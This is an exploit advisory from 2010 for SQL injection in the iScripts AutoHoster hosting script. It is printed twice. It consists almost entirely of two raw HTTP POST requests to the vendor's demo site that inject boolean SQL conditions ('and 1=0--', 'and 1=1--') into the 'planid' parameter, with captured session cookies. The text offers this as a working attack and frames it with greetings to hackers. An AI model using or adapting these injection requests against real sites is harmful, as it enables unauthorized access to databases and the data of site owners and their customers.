$-------------------------------------------------------------------------------------------------------------------
$ iScripts AutoHoster SQL injection Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.iscripts.com/autohoster/
$ Date : 02/07/2010
$ Email : sangteamhtham@gmail.com
$****************
$Exploit:
$
$
Code:
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz
$****************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
iScripts AutoHoster.txt
$-------------------------------------------------------------------------------------------------------------------
$ iScripts AutoHoster SQL injection Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.iscripts.com/autohoster/
$ Date : 02/07/2010
$ Email : sangteamhtham@gmail.com
$****************
$Exploit:
$
$
Code:
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz
$****************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------